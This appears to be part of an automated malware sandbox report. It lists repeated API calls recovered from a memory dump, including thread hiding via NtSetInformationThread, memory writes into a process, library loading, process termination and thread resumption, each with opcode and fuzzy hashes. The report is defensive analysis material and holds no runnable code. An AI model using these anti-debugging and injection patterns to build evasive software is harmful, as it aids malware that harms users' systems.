                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadThread
                                                        • String ID: 1.!T
                                                        • API String ID: 543350213-3147410236
                                                        • Opcode ID: 35089c31494100f04615fe04017fb476b12c69e69e469a9dc016a08fc5708bc2
                                                        • Instruction ID: e4d68259fa4ca850d28a9d5af9eed9f085b8ba2fabeade6d1ba6f6125be4d11d
                                                        • Opcode Fuzzy Hash: 35089c31494100f04615fe04017fb476b12c69e69e469a9dc016a08fc5708bc2
                                                        • Instruction Fuzzy Hash: 5F2138B57953066AFF242A344DE17EE22AB8F97764FA40125FE525B2C4DBB0C884CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 9ded97cad18d6e254f01c7355c9924557c7479bcccee8786f3c72cae2b7d6e97
                                                        • Instruction ID: d4babbe5d69f6dbdba177389bdc78f5638e04e5d8c93ef75fedaf57a0e4fe166
                                                        • Opcode Fuzzy Hash: 9ded97cad18d6e254f01c7355c9924557c7479bcccee8786f3c72cae2b7d6e97
                                                        • Instruction Fuzzy Hash: 13213DB57953055EEF242A3449E07EF269B4F47364F644225ED235B2C1DB70C884CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: e63492068f10140338ae8c77ed5341efc38e9fbfc2db5201cdcc45b50a613f4e
                                                        • Instruction ID: 56a275f16c13599c0fe714f10834be769364d2d26647924788ed085b81c306a2
                                                        • Opcode Fuzzy Hash: e63492068f10140338ae8c77ed5341efc38e9fbfc2db5201cdcc45b50a613f4e
                                                        • Instruction Fuzzy Hash: 95919031A44307AEDF3839644D987FE215F8F83764FB44526DC8BA7581DB66C8C6C912
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: a8dc549b20de86916fde567d78925fcf032ffe8258dc9dbfc35461dd3f73f50d
                                                        • Instruction ID: bf862ab4e6ff9f4d5c67fa46a9dbcf3034f0c88c3fc969310fb8831b3ce53144
                                                        • Opcode Fuzzy Hash: a8dc549b20de86916fde567d78925fcf032ffe8258dc9dbfc35461dd3f73f50d
                                                        • Instruction Fuzzy Hash: 52817F31A44307AEEF3839648D987FE215E8F83764FB44516EC8BA75C1DB66C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d224529704086a0eb9778362b6486a8bc84281932cae0161527c12f01ab6c202
                                                        • Instruction ID: abd40f552b8886b279f8b477ef4e66b23d933f5d9caed9490b9d92f4e470560e
                                                        • Opcode Fuzzy Hash: d224529704086a0eb9778362b6486a8bc84281932cae0161527c12f01ab6c202
                                                        • Instruction Fuzzy Hash: 2F81C231A04347AAEF3839244E987FE115F8F83764FB44526DC8BA35C1D726C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9355ef3b939ca94bb7828afef1ef64d22ba5d5660c8fcf9e583344bed052d126
                                                        • Instruction ID: 6a787ae19986144fb7fa4f270331b50fcc236396522e59535dd53acdd3719c1d
                                                        • Opcode Fuzzy Hash: 9355ef3b939ca94bb7828afef1ef64d22ba5d5660c8fcf9e583344bed052d126
                                                        • Instruction Fuzzy Hash: 52818F31A44307AAEF3839644E987FE115E8F83764FB44526DC8BA69C1DB26C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6fc37fcee18c074f9ecbb6716df372dd349432dda5bb8b7d6c65cf82c0774a19
                                                        • Instruction ID: 38b355ad26baa18419ae563149305e22c540dd3260b0bdc249b41a7f5471a905
                                                        • Opcode Fuzzy Hash: 6fc37fcee18c074f9ecbb6716df372dd349432dda5bb8b7d6c65cf82c0774a19
                                                        • Instruction Fuzzy Hash: 27718031A44347AAEF3839644E987FE115F8F83764FB44516DC8BA75C1DB26C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 67a877756b8da592bed18958341e4bd90b640c7e4d5bbfba31db12aff02c93a1
                                                        • Instruction ID: 66e12624d7728f39eb89a018488883ea7a9274227d21b0e25180ef4b315b6112
                                                        • Opcode Fuzzy Hash: 67a877756b8da592bed18958341e4bd90b640c7e4d5bbfba31db12aff02c93a1
                                                        • Instruction Fuzzy Hash: EC719030A44303AAEF3839644E987FE115F8F83760FB44526DCCBA29C1DB26C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 44b245f12f0612465cc1ce1969d5469a74d9dd811f33d06094cf0f1ff808809d
                                                        • Instruction ID: 13b67e05358dfcfe65dc4296b668afc4a43851058ee185d0891ca873679d93df
                                                        • Opcode Fuzzy Hash: 44b245f12f0612465cc1ce1969d5469a74d9dd811f33d06094cf0f1ff808809d
                                                        • Instruction Fuzzy Hash: 1C717D30A44343AAEF3839644E987FE115E8F83764FB4451ADCCBA79C2D766C986C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 979201df5d091dcce0aac23994fcac4a14f4fed3dff66c5a7ab294256bff688a
                                                        • Instruction ID: 559560dc209a62ec3df8189ddb76d0b07ac59c739ff49839c76c7cfefdf6a95f
                                                        • Opcode Fuzzy Hash: 979201df5d091dcce0aac23994fcac4a14f4fed3dff66c5a7ab294256bff688a
                                                        • Instruction Fuzzy Hash: D1616C30A44343AAEF3839644E987FE115F8F83764FB4491ADCCBA7582D766C986C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 564fefb24baa88bcb39e7a7588835a37ff321ccf131ca6695cc910091793a9a5
                                                        • Instruction ID: b0db0fc30ee5d2f5c30ae257f027fff34097b9f06a5982190bcc1a73802bb4b1
                                                        • Opcode Fuzzy Hash: 564fefb24baa88bcb39e7a7588835a37ff321ccf131ca6695cc910091793a9a5
                                                        • Instruction Fuzzy Hash: 5971D0B1244309AFEF315E20CD86BF9766AEF06344F504529FE8A976D1C7B998C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 053b15194ce7d4e320ac784c270ca9b09bf02c1dcc73192bb6bc3ce5dcc9b9ad
                                                        • Instruction ID: 0e489a083ac5c60116e2617d9ad1ae0c8553d7df4a4de861fe149bf62e5c220f
                                                        • Opcode Fuzzy Hash: 053b15194ce7d4e320ac784c270ca9b09bf02c1dcc73192bb6bc3ce5dcc9b9ad
                                                        • Instruction Fuzzy Hash: 9A71D0B1244309AEEF311E10CD86BF9366AFF06344F504529FE8A976D1C7B998C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 05462d88cd80ab58d52e2e4ea5dfa42f08c3ca6c3f667d7e8800c26e7753bfca
                                                        • Instruction ID: 68fc076d9677cb04aba96d78678931c1d8ae3bfb7f915c05fcb1a94b82c9044d
                                                        • Opcode Fuzzy Hash: 05462d88cd80ab58d52e2e4ea5dfa42f08c3ca6c3f667d7e8800c26e7753bfca
                                                        • Instruction Fuzzy Hash: CF61EFB1204308AFFF351E20CD85BF9366AEF06744F148529FE8A965D1C7B998C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: aa569622c9322beab37f05cc56ba4daf3b86b0ddb9f653559bc4d943d33f62a0
                                                        • Instruction ID: cd95445540e856972787ed8631b0494fd23f7fbccb71880c51c92f9151b88b5b
                                                        • Opcode Fuzzy Hash: aa569622c9322beab37f05cc56ba4daf3b86b0ddb9f653559bc4d943d33f62a0
                                                        • Instruction Fuzzy Hash: 705100B1244308AEFF351E20CD85BF9366AEF06744F544529FE8A9A5D1C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 5a7f5fcc91cfd2bc68782bb9a82f25ed5fc3a116e7b5b4eb2749fc4edfa434c8
                                                        • Instruction ID: b9e6cdc2adf173ddf46e8291e90277edb85abf5f27eb1b0a67794e82e692dd59
                                                        • Opcode Fuzzy Hash: 5a7f5fcc91cfd2bc68782bb9a82f25ed5fc3a116e7b5b4eb2749fc4edfa434c8
                                                        • Instruction Fuzzy Hash: 9F410730A0C301CEEF245A288A943F562AEEF577A4F55862FDD474BD96E3758881C742
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 26e9a73bb8a25732d100804fbd7a6bc3c580dac3c4f1b85224efa929146d7b23
                                                        • Instruction ID: 9b369af8a3ba5e26c94ed8caed397ad97508050991157484faa7e681f8fa4c83
                                                        • Opcode Fuzzy Hash: 26e9a73bb8a25732d100804fbd7a6bc3c580dac3c4f1b85224efa929146d7b23
                                                        • Instruction Fuzzy Hash: B251F0B1244308AEEF360E20CD85BF9366AEF0A704F144569FE8AD65D1C7B988C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: f3814b515f52ecceb578e5ab24d1897fabcb30feae2d3ba1987714212e45f045
                                                        • Instruction ID: 785290d11bef944acbeb64bb3c7a4af82494d5d5e80184c71fa5c26a86ad38f3
                                                        • Opcode Fuzzy Hash: f3814b515f52ecceb578e5ab24d1897fabcb30feae2d3ba1987714212e45f045
                                                        • Instruction Fuzzy Hash: 7741F1B1204308AFEF761E24CD85BF9366AFF0A344F144569FE8AD6591C7B988C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: aacc9b34f9f94630e88223734d515f81cde13334bc665e2a0849857fa1dd380c
                                                        • Instruction ID: 6c8706f2d1047ab04f5a854cb51c665d13f24a6cabbb762342b1ee89a3e736d2
                                                        • Opcode Fuzzy Hash: aacc9b34f9f94630e88223734d515f81cde13334bc665e2a0849857fa1dd380c
                                                        • Instruction Fuzzy Hash: B4412530A0C341CDEF245B24CAA83B522AEAF57794F59456FCC474BD97E3798881CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 5e2963961b3c2767c29c6e132618bbaf8fe4e0d40bc68e3fb0b41db30ae99e71
                                                        • Instruction ID: 31747b145507d03be411aa3df9b3c32c6c35e89f2ed386912bfa50e7f88bb982
                                                        • Opcode Fuzzy Hash: 5e2963961b3c2767c29c6e132618bbaf8fe4e0d40bc68e3fb0b41db30ae99e71
                                                        • Instruction Fuzzy Hash: 3841E430A0C341CDEF245B28CAA43B562ADAF57794F49556FCC474BD97E3798881CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: bad28ba5c639aa74709cbd1efec7a638820ee48b09ce1a25ef2a12e12fa1b238
                                                        • Instruction ID: 9fa8408a56b5fb69be8245a96d8a7e204a661edb0eb4eb02b4d9a9e5029fff07
                                                        • Opcode Fuzzy Hash: bad28ba5c639aa74709cbd1efec7a638820ee48b09ce1a25ef2a12e12fa1b238
                                                        • Instruction Fuzzy Hash: 664100B1204308AFEF3A0E24CD85BF9366AFF0A344F144569FE8AC6591C77988C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: ee0e4515da68d855572b6e1d22c92b7d78e396dc7876ab0edcf55ca28843c9fd
                                                        • Instruction ID: 2bcf204b90ead8194c49eb720f73c48629ace44a047f150ba0a56d3d5d58d423
                                                        • Opcode Fuzzy Hash: ee0e4515da68d855572b6e1d22c92b7d78e396dc7876ab0edcf55ca28843c9fd
                                                        • Instruction Fuzzy Hash: 8541F630A0C341CDEF245B288AA43B522ADAF57B94F49556FCC474BD96E3758881CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 904910687bf34de62f8efa47671bcda4e79177a24a789071080aca2ed726970b
                                                        • Instruction ID: cff48a3482ad9825dfdb1e2cc678e06555fa7bf9a450db8ebd2231e938bb0b60
                                                        • Opcode Fuzzy Hash: 904910687bf34de62f8efa47671bcda4e79177a24a789071080aca2ed726970b
                                                        • Instruction Fuzzy Hash: 7341F5B5604308AFEF361E24CD85BF9366AFF0A344F148559FE8AD6591C77988C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 4b708dc78e12af0809ebc0e93c21e2c84d2c3c4b1659f48369df20efcd8f46df
                                                        • Instruction ID: 77470ce605aae1b449024a5f65a9616e4f6d03884e50feebf4012738b7ed4133
                                                        • Opcode Fuzzy Hash: 4b708dc78e12af0809ebc0e93c21e2c84d2c3c4b1659f48369df20efcd8f46df
                                                        • Instruction Fuzzy Hash: 9C31D430E0C341CDEF245B248B983B562ADAF57B94F49566FCC074BDA6E3758881CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 99dd517a251d73fb07f5fce36588bc44fccac37cb875db4da4da85eaeef0b9a2
                                                        • Instruction ID: 500d9b05725c6c1ee7c3d9eebcf6aa67cb538d4fa97e8ada83c1b5d6eea72865
                                                        • Opcode Fuzzy Hash: 99dd517a251d73fb07f5fce36588bc44fccac37cb875db4da4da85eaeef0b9a2
                                                        • Instruction Fuzzy Hash: 7431C130A0C341CDEF245A288AA83B562ADAF17B94F49566FCC474BD96E3758880CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 8c1efaa087b65b22a7711bc7552f85221244873e3f5b9d58bb65f989e715df78
• Instruction ID: 0d1bc3d9bb2c0d22d4761277fb958183327477687ee986d3989fe881b56a996b
• Opcode Fuzzy Hash: 8c1efaa087b65b22a7711bc7552f85221244873e3f5b9d58bb65f989e715df78
• Instruction Fuzzy Hash: 4731C430E0C341DDEF245B248B983B562ADAF47B94F49565FCC474BD96E3758880CB42
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
• LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: LibraryLoadMemoryVirtualWrite
• String ID:
• API String ID: 3569954152-0
• Opcode ID: e776ede7246647ce4b1728509fd7802ddaee84b389e07ecdbb35dba95cee4bf0
• Instruction ID: 98e623e07bd23b8f8bcf357b8c52454b4e7e4e63bb8683329c826783b5485b4b
• Opcode Fuzzy Hash: e776ede7246647ce4b1728509fd7802ddaee84b389e07ecdbb35dba95cee4bf0
• Instruction Fuzzy Hash: 913128B0608348AFEF264E20CD94BF83B6AFF0A304F444199FD8A96591C77948C4CB41
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 0150aee9bf1b92426d5c057a0d28099218decbadc6813dc8f41b54c72e901d9c
• Instruction ID: 95cefcf0ba6895e4133cfb250412e1799fa7b6d9ba588b77e5cbeb8dcd298b39
• Opcode Fuzzy Hash: 0150aee9bf1b92426d5c057a0d28099218decbadc6813dc8f41b54c72e901d9c
• Instruction Fuzzy Hash: 8031C430E0C341DDEF241B2487A87B262ADAF17A94F49565FCC074ADA6E37588C0CB42
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
• LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: LibraryLoadMemoryVirtualWrite
• String ID:
• API String ID: 3569954152-0
• Opcode ID: 8468a7943b006115d2d2a39b43f64a1f1ac1597f852318077e205af23bc269d1
• Instruction ID: 110c697004004903eb095ba6ff61f23b05c943333b94703fb9fc79f2834004e2
• Opcode Fuzzy Hash: 8468a7943b006115d2d2a39b43f64a1f1ac1597f852318077e205af23bc269d1
• Instruction Fuzzy Hash: 0531F1B0604308AEEF3A4E24CD95BF9366AFF0A344F104569FE8AD2591C77988C8CB41
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 4d28aba94f55b9c650c930dc7358f4d0d59c920245c0b56e6f117a709c625143
• Instruction ID: e739270ea7e8b187cfcc71b79dcba20df2e2f343a393fbfb47a56bc41885c3ad
• Opcode Fuzzy Hash: 4d28aba94f55b9c650c930dc7358f4d0d59c920245c0b56e6f117a709c625143
• Instruction Fuzzy Hash: 2B319E30E08345DDEF245B188B983B162ADAF17AA4F49565FCC474BDA6E37588C0CB42
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 66dc5a3ffe455dc7554276dca52ccf5161b9bf9f3a540dbef270af22022b27fa
• Instruction ID: 37d2b34187af88a9689f7b45b792e7cbfad8e4b5caf37cbd790519c7bff83e4e
• Opcode Fuzzy Hash: 66dc5a3ffe455dc7554276dca52ccf5161b9bf9f3a540dbef270af22022b27fa
• Instruction Fuzzy Hash: A721A130E0C346DDEF245B1887983B562ADAF57AA4F48566FCC074BCA6E37588C4CB42
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
